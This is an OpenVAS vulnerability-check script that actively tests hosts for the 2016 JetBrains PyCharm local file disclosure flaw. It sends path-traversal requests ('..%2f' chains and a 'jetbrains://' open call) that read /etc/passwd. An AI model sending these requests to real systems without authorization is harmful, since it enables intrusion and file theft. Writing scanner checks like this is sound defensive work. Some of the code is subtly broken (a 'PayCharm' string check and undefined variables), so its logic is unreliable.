  1. ###############################################################################
  2. # OpenVAS Vulnerability Test
  3. # $Id$
  4. #
  5. # JetBrains (Pycharm) Remote Code Execution and Local File Disclosure Vulnerability (Active Check)
  6. #
  7. # Authors:
  8. # Tameem Eissa <tameem.eissa@greenbone.net>
  9. #
  10. # Copyright:
  11. # Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
  12. #
  13. # This program is free software; you can redistribute it and/or modify
  14. # it under the terms of the GNU General Public License version 2
  15. # (or any later version), as published by the Free Software Foundation.
  16. #
  17. # This program is distributed in the hope that it will be useful,
  18. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  19. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  20. # GNU General Public License for more details.
  21. #
  22. # You should have received a copy of the GNU General Public License
  23. # along with this program; if not, write to the Free Software
  24. # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
  25. ###############################################################################
  26.  
  27. if(description)
  28. {
  29. script_oid("1.3.6.1.4.1.25623.1.0.107231");
  30. script_version("$Revision$");
  31. script_tag(name:"cvss_base", value:"5.0");
  32. script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  33. script_tag(name:"last_modification", value:"$Date$");
  34. script_tag(name:"creation_date", value:"2017-08-21 10:25:40 +0530 (Mon, 21 Aug 2017)");
  35. script_tag(name:"qod_type", value:"exploit");
  36. script_name("JetBrains (Pycharm) Remote Code Execution and Local File Disclosure (Active Check)");
  37.  
  38. script_tag(name:"summary", value:"This host is installed with Jetbrains and is prone to multiple vulnerabilities.");
  39.  
  40. script_tag(name:"vuldetect", value:"Send a crafted request via HTTP Get and POST and
  41. check The response.");
  42.  
  43. script_tag(name:"insight", value:"Multiple flaws are due to unproper escaping from the project directory.");
  44.  
  45. script_tag(name:"impact", value:"Successful exploitation will allow
  46. remote attackers to read arbitrary files on the target system.
  47.  
  48. Impact Level: System/Application");
  49.  
  50. script_tag(name:"affected", value:"JetBrains Pycharm 2016 releases before May. Affected IDEs included also Android Studio, WebStorm, IntelliJ IDEA and several others. This check was done only for Pycharm IDE.");
  51.  
  52. script_tag(name: "solution" , value: "Patch is available at : https://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/");
  53.  
  54. script_tag(name:"solution_type", value:"VendorFix");
  55.  
  56. script_xref(name : "URL" , value : "http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/");
  57.  
  58. script_category(ACT_GATHER_INFO);
  59. script_copyright("Copyright (C) 2015 Greenbone Networks GmbH");
  60. script_family("Web application abuses");
  61. script_dependencies("find_service.nasl");
  62. exit(0);
  63. }
  64.  
  65. include( "http_func.inc");
  66. include( "http_keepalive.inc");
  67. include( "misc_func.inc" );
  68.  
  69. function guessProjectName ()
  70. {
  71.  
  72. Dictionary = make_list(
  73. "ideas",
  74. "purescript",
  75. "image-analogies",
  76. "powerline-shell",
  77. "python-oauth2",
  78. "create",
  79. "jquery-boilerplate",
  80. "sqlbrite",
  81. "foresight.js",
  82. "iOS-Core-Animation-Advanced-Techniques",
  83. "elemental",
  84. "peek",
  85. "TheAmazingAudioEngine",
  86. "orientdb",
  87. "testing");
  88.  
  89. foreach name (Dictionary)
  90. {
  91.  
  92. url = "/" + name + "/.idea/workspace.xml";
  93. req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
  94.  
  95.  
  96. res = http_keepalive_send_recv( port: port, data: req );
  97.  
  98. if ( res =~ "HTTP/1.. 200" )
  99. {
  100. break;
  101. }
  102.  
  103. }
  104.  
  105. if ( !isnull( name ) ) return name;
  106.  
  107. }
  108.  
  109. function buildDotsSegsToRoot( path )
  110. {
  111. i = 0;
  112. depth = 0;
  113. while (i < strlen( projectPath ) )
  114. {
  115. if ( projectPath[i] == "/" )
  116. depth += 1;
  117. i = i + 1;
  118.  
  119. }
  120.  
  121. for ( i = 0; i < depth; i = i + 1 )
  122. {
  123. dotSegs += "..%2f";
  124. }
  125. return dotSegs;
  126. }
  127.  
  128. function leakWithPyCharmHelpers( res )
  129. {
  130.  
  131. homePath = eregmatch( pattern: 'homePath": "(.*)"', string: res);
  132. homePath = homePath[1];
  133. projectName = "helpers";
  134. projectPath = homePath + "/helpers";
  135. url = "/api/internal";
  136. data = '{"url": "jetbrains://whatever/open//' + projectPath + '"}' ;
  137.  
  138. req = http_post_req(port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/x-www-form-urlencoded', 'Connection', 'keep-alive' ) );
  139.  
  140.  
  141. res = http_keepalive_send_recv( port: port, data: req );
  142.  
  143. dotSegs = buildDotsSegsToRoot( path: projectPath);
  144.  
  145. url = "/helpers" + "/" + dotSegs + "etc/passwd";
  146.  
  147. req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
  148.  
  149. res = http_keepalive_send_recv( port: port, data: req, bodyonly: TRUE );
  150.  
  151. if ( res =~ "HTTP/1.. 200 OK" && egrep( pattern: ".*root:.*:0:[01]:.*", string: res ) )
  152. {
  153. security_message( port:port, data:report );
  154.  
  155. }
  156.  
  157. }
  158.  
  159. function leakWithProject(name)
  160. {
  161.  
  162. dotSegs = "";
  163. for ( i = 1; i < 5; i = i + 1 )
  164. {
  165.  
  166. dotSegs += "..%2f";
  167.  
  168. url = "/" + name + "/" + dotSegs + "etc/passwd";
  169.  
  170. if (http_vuln_check(port: port, url: url, pattern: "root:.*:0:[01]:", check_header: TRUE, debug: TRUE))
  171.  
  172. {
  173. report = report_vuln_url( port:port, url:url ) + '\n\n';
  174.  
  175. report += string( "Here are the contents of the file '/etc/passwd' that\n",
  176. "OpenVAS was able to read from the remote host :\n",
  177. "\n", res );
  178. return report;
  179.  
  180. }
  181.  
  182. }
  183. }
  184.  
  185. for ( port = 63342; port < 63352; port = port + 1){
  186.  
  187. if ( get_port_state ( port) ){
  188.  
  189. break;
  190. }
  191. }
  192.  
  193. if ( ! get_port_state ( port ) ) exit ( 0 );
  194.  
  195. random = rand_str( length: 13, charset: "0123456789" );
  196.  
  197. url = "/api/about?more-true?a=" + random;
  198.  
  199. req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
  200.  
  201. res = http_keepalive_send_recv( port: port, data: req );
  202.  
  203. if ( ! res >< "PayCharm" ) exit ( 0 );
  204.  
  205.  
  206. configPath = eregmatch( pattern: 'configPath": "(.*)config",', string: res );
  207.  
  208. if ( ! isnull ( configPath ) )
  209. {
  210.  
  211. configPath = configPath[ 1 ] + "config";
  212. Report = leakWithPyCharmHelpers( res );
  213.  
  214. }
  215. else
  216. {
  217.  
  218. ProjectName = guessProjectName();
  219. if ( ! isnull( ProjectName ) )
  220. {
  221.  
  222. Report = leakWithProject( name: ProjectName );
  223.  
  224. }
  225.  
  226. }
  227.  
  228. if ( isnull ( Report ) ) exit ( 0 );
  229.  
  230. security_message( port:port, data:Report );